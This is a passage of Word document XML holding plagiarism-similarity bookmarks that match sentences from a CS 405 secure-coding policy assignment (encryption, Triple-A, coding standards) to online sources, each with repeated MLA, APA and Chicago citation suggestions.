            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="The only item you must complete beyond this point is the Policy Version History table. Audit Controls and Management Every software development effort must be able to provide evidence of compliance for each software deployed into any Green Pace managed environment.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;, https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;. (n.d.). Retrieved from https://github.com/BrandonRicks/CS-405-Secure-Coding</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“GitHub - BrandonRicks/CS-405-Secure-Coding” n.d., https://github.com/BrandonRicks/CS-405-Secure-Coding.</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Operating system logs Firewall logs Anti-malware logs 18 The only item you must complete beyond this point is the Policy Version History table. Audit Controls and ...">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ource int2:sourceType="Online" int2:sourceTitle="Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="Risk Assessment Complete this section on the coding standards tables. Enter high, medium, or low for each of the headers, then rate it overall using a scale from 1 to 5, 5 being the greatest threat. ... 21 The only item you must complete beyond this point is the Policy Version History table.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_Ryd6k4Iv" int2:invalidationBookmarkName="" int2:hashCode="9BT5e5YXt2zwBa" int2:id="DyCl2yXm">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Map the principles to each of the standards, and provide a justification for the connection between the two.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="[Solved] Map the Principles Map the principles to each of the standards ..." int2:sourceUrl="https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/" int2:sourceSnippet="Map the Principles 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
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“[Solved] Map the Principles Map the principles to each of the standards ...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“[Solved] Map the Principles Map the principles to each of the standards ...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“[Solved] Map the Principles Map the principles to each of the standards ...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;[Solved] Map the Principles Map the principles to each of the standards ...&lt;/i&gt;, https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;[Solved] Map the Principles Map the principles to each of the standards ...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“[Solved] Map the Principles Map the principles to each of the standards ...” n.d., https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_cuKDldUc" int2:invalidationBookmarkName="" int2:hashCode="2RB+457MZehxpq" int2:id="HobzxBje">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Complete this section of each table on the coding standards to show the tools that may be used to detect issues.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="Automated Detection Complete this section of each table on the coding standards to show the tools that may be used to detect issues. Provide the tool name, version, checkbox, and description. List one or more tools that can automatically detect this issue and its version number, name of the rule or check (preferably with a link), and any ...">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ource int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippe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
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;, https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;. (n.d.). Retrieved from https://github.com/BrandonRicks/CS-405-Secure-Coding</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“GitHub - BrandonRicks/CS-405-Secure-Coding” n.d., https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_UZcJlbyI" int2:invalidationBookmarkName="" int2:hashCode="TkDsoDJacsmJw/" int2:id="wBgwRqbe">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Explain each type of encryption, how it is used, and why and when the policy applies.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="Explain each type of encryption, how it is used, and why and when the policy applies. Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies. Write policies for each and explain what it is, how it should be applied in practice, and why it should be used.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;, https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;. (n.d.). Retrieved from https://github.com/BrandonRicks/CS-405-Secure-Coding</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“GitHub - BrandonRicks/CS-405-Secure-Coding” n.d., https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="6. Create Policies for Encryption and Triple A Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided. a. Explain each type of encryption, how it is used, and why and when the policy applies. b.">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ource int2:sourceType="Online" int2:sourceTitle="Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="6. Create Policies for Encryption and Triple A Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided. a. Explain each type of encryption, how it is used, and why and when the policy applies. b. Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_bFzerBXF" int2:invalidationBookmarkName="" int2:hashCode="zfwD+8rFSH+lh3" int2:id="L9AXVqEi">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Well-documented data-control standards defining the expected security posture of data at rest, in flight, and in use">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405 Security Policy Template (docx) - CliffsNotes" int2:sourceUrl="https://www.cliffsnotes.com/study-notes/9898092" int2:sourceSnippet="Evidence will include the following: Code compliance to standards Well-documented access-control strategies, with sampled evidence of compliance Well-documented data-control standards defining the expected security posture of data at rest, in flight, and in use Historical evidence of sustained practice (emails, logs, audits, meeting notes ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Security Policy Template (docx) - CliffsNotes”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Security Policy Template (docx) - CliffsNotes”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Security Policy Template (docx) - CliffsNotes”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Security Policy Template (docx) - CliffsNotes&lt;/i&gt;, https://www.cliffsnotes.com/study-notes/9898092.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Security Policy Template (docx) - CliffsNotes&lt;/i&gt;. (n.d.). Retrieved from https://www.cliffsnotes.com/study-notes/9898092</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS 405 Security Policy Template (docx) - CliffsNotes” n.d., https://www.cliffsnotes.com/study-notes/9898092.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405 Security Policy final (docx) - Course Sidekick" int2:sourceUrl="https://www.coursesidekick.com/information-systems/1414487" int2:sourceSnippet="Evidence will include the following: Code compliance to standards Well-documented access-control strategies, with sampled evidence of compliance Well-documented data-control standards defining the expected security posture of data at rest, in flight, and in use Historical evidence of sustained practice (emails, logs, audits, meeting notes ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Security Policy final (docx) - Course Sidekick”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Security Policy final (docx) - Course Sidekick”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“CS 405 Security Policy final (docx) - Course Sidekick”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Security Policy final (docx) - Course Sidekick&lt;/i&gt;, https://www.coursesidekick.com/information-systems/1414487.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;CS 405 Security Policy final (docx) - Course Sidekick&lt;/i&gt;. (n.d.). Retrieved from https://www.coursesidekick.com/information-systems/1414487</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“CS 405 Security Policy final (docx) - Course Sidekick” n.d., https://www.coursesidekick.com/information-systems/1414487.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="Green pace already has a well established devops - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/" int2:sourceSnippet="Evidence will include the following: Code compliance to standards Well-documented access-control strategies, with sampled evidence of compliance Well-documented data-control standards defining the expected security posture of data at rest, in flight, and in use Historical evidence of sustained practice (emails, logs, audits, meeting notes ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Green pace already has a well established devops - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Green pace already has a well established devops - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Green pace already has a well established devops - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green pace already has a well established devops - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Green pace already has a well established devops - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Green pace already has a well established devops - Course Hero” n.d., https://www.coursehero.com/file/p2ms5vhg/Green-Pace-already-has-a-well-established-DevOps-process-and-infrastructure/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_WgV9MlTl" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="zxji2Ukt">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iwh6HiS8" int2:invalidationBookmarkName="" int2:hashCode="axDXHV306aARx5" int2:id="MKgPhKms">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CcWS8PkN" int2:invalidationBookmarkName="" int2:hashCode="SJU7h8NAeAvrsG" int2:id="MLkkPyY4">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Write policies for each and explain what it is, how it should be applied in practice, and why it should be used.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="CS 405-exception summary report 1.docx - Green Pace..." int2:sourceUrl="https://www.coursehero.com/file/100193701/CS-405-exception-summary-report-1docx/" int2:sourceSnippet="b. Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies. Write policies for each and explain what it is, how it should be applied in practice, and why it should be used. a. Encryption Explain what it is and how and why the policy applies. Encryption at rest [Insert text].">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ource int2:sourceType="Online" int2:sourceTitle="Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="Risk Assessment Complete this section on the coding standards tables. Enter high, medium, or low for each of the headers, then rate it overall using a scale from 1 to 5, 5 being the greatest threat. ... Write policies for each and explain what it is, how it should be applied in practice, and why it should be used. ...">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Risk assessment complete this section on the coding - Course Hero” n.d., https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_YZz9zC6m" int2:invalidationBookmarkName="" int2:hashCode="EtWbD9to/tMnSk" int2:id="MaO1lQDN">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="You may have more than one principle for each standard, and the principles may be used more than once.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="Map the Principles Map the principles to each of the standards, and..." int2:sourceUrl="https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/" int2:sourceSnippet="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
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Map the Principles Map the principles to each of the standards, and...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Map the Principles Map the principles to each of the standards, and...”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Map the Principles Map the principles to each of the standards, and...”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Map the Principles Map the principles to each of the standards, and...&lt;/i&gt;, https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Map the Principles Map the principles to each of the standards, and...&lt;/i&gt;. (n.d.). Retrieved from https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“Map the Principles Map the principles to each of the standards, and...” n.d., https://www.coursehero.com/tutors-problems/Computer-Science/57235513-Map-the-Principles-Map-the-principles-to-each-of-the-standards-and/.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
          </int2:similarityCritique>
        </oel:ext>
      </int2:extLst>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_KP14w3jv" int2:invalidationBookmarkName="" int2:hashCode="++ZjfNln5ks5o5" int2:id="OlKntai7">
      <int2:state int2:value="Rejected" int2:type="AugLoop_Similarity_SimilarityAnnotation"/>
      <int2:extLst>
        <oel:ext uri="426473B9-03D8-482F-96C9-C2C85392BACA">
          <int2:similarityCritique int2:version="1" int2:context="Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies.">
            <int2:source int2:sourceType="Online" int2:sourceTitle="GitHub - BrandonRicks/CS-405-Secure-Coding" int2:sourceUrl="https://github.com/BrandonRicks/CS-405-Secure-Coding" int2:sourceSnippet="Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies. Write policies for each and explain what it is, how it should be applied in practice, and why it should be used.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“GitHub - BrandonRicks/CS-405-Secure-Coding”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;, https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;GitHub - BrandonRicks/CS-405-Secure-Coding&lt;/i&gt;. (n.d.). Retrieved from https://github.com/BrandonRicks/CS-405-Secure-Coding</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>“GitHub - BrandonRicks/CS-405-Secure-Coding” n.d., https://github.com/BrandonRicks/CS-405-Secure-Coding.</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
            </int2:source>
            <int2:source int2:sourceType="Online" int2:sourceTitle="Risk assessment complete this section on the coding - Course Hero" int2:sourceUrl="https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/" int2:sourceSnippet="6. Create Policies for Encryption and Triple A Include all three types of encryption (in flight, at rest, and in use) and each of the three elements of the Triple-A framework using the tables provided. a. Explain each type of encryption, how it is used, and why and when the policy applies. b. Explain each type of Triple-A framework strategy, how it is used, and why and when the policy applies.">
              <int2:suggestions int2:citationType="Inline">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Apa" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
                <int2:suggestion int2:citationStyle="Chicago" int2:isIdentical="1">
                  <int2:citationText>(“Risk assessment complete this section on the coding - Course Hero”)</int2:citationText>
                </int2:suggestion>
              </int2:suggestions>
              <int2:suggestions int2:citationType="Full">
                <int2:suggestion int2:citationStyle="Mla" int2:isIdentical="1">
                  <int2:citationText>&lt;i&gt;Risk assessment complete this section on the coding - Course Hero&lt;/i&gt;, https://www.coursehero.com/file/p649vnpm/Risk-Assessment-Complete-this-section-on-the-coding-standards-tables-Enter-high/.</int2:citationText>
                </int2:suggestion>
